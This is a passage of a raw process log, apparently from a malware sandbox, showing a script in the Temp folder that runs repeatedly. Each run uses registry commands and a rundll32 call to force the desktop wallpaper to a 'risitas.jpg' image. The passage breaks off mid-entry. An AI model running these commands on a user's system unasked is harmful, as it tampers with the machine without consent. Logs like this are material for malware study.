C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5572
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5436
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5552
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5796
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5708
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5564
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5588
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5708
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5860
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5744
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:5592
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:5744
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:5608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6168
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6180
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6196
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6208
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:6372
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6380
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6404
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6424
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6436
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6448
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:6464
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6480
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6504
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6516
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6528
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6540
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:6556
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6564
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6584
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6600
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6620
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6632
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:6648
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6664
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6688
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6700
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6712
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6724
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:6744
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6752
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6788
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6800
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6812
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6824
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:6840
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6860
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6952
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7052
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7064
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7080
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7096
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7112
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7136
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7148
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7160
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6152
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:6168
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6200
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6208
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6228
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6368
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6380
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:6428
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6424
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6480
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6728
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6724
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6764
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:6788
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6816
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6824
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:6860
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:6892
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6896
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7044
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7052
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7072
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7088
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7140
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7156
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:6856
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6860
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7068
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7084
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7088
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7152
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7156
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6392
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7076
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7068
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7080
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7140
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7164
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:6892
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7116
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7144
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7148
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6392
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7084
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7080
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7068
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7280
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7292
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7312
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7348
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7360
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7384
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7408
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7424
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7472
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7488
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7500
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7520
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7600
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7704
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7716
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7732
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7748
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7772
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7784
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7796
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7808
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7824
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7832
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7868
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7884
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7896
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7912
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:8080
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:8096
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:8120
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:8132
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:8144
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:8156
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:8172
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7068
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7224
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7276
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7296
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7292
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7328
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7336
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7360
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7472
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7752
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7792
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7796
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7808
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7880
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7892
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7908
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7916
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7928
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7992
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:8124
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:8140
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:8164
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7748
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7784
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7792
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7888
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7892
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7908
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7992
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:8132
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:8136
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7296
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:8168
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:32
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7836
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7900
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7904
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:5404
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5412
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5400
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7940
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:7316
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7756
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:8212
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:8224
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:8236
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:8248
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:8264
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:8280
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:8304
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:8316
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:8328
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:8340
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:8356
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:8380
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:8452
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:8464
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:8480
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:8496
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20425.vbs"5⤵PID:8520
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:8704
-
-
